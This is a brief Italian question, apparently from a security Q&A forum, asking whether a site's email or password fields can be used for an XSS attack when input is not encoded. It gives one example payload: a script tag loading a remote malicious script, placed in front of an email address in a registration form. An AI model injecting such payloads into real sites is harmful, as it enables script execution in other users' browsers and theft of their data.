Nella maggior parte dei siti web che dispongono di account di accesso, ci sono almeno due campi:
- password
È possibile utilizzare uno di questi campi per montare un attacco XSS (supponendo che non sia codificata per i caratteri)?
Ad esempio, potrebbe essere inviato nel campo email di un modulo di registrazione:
<script src="www.example.com/mymaliciousscript.js"></script>[email protected]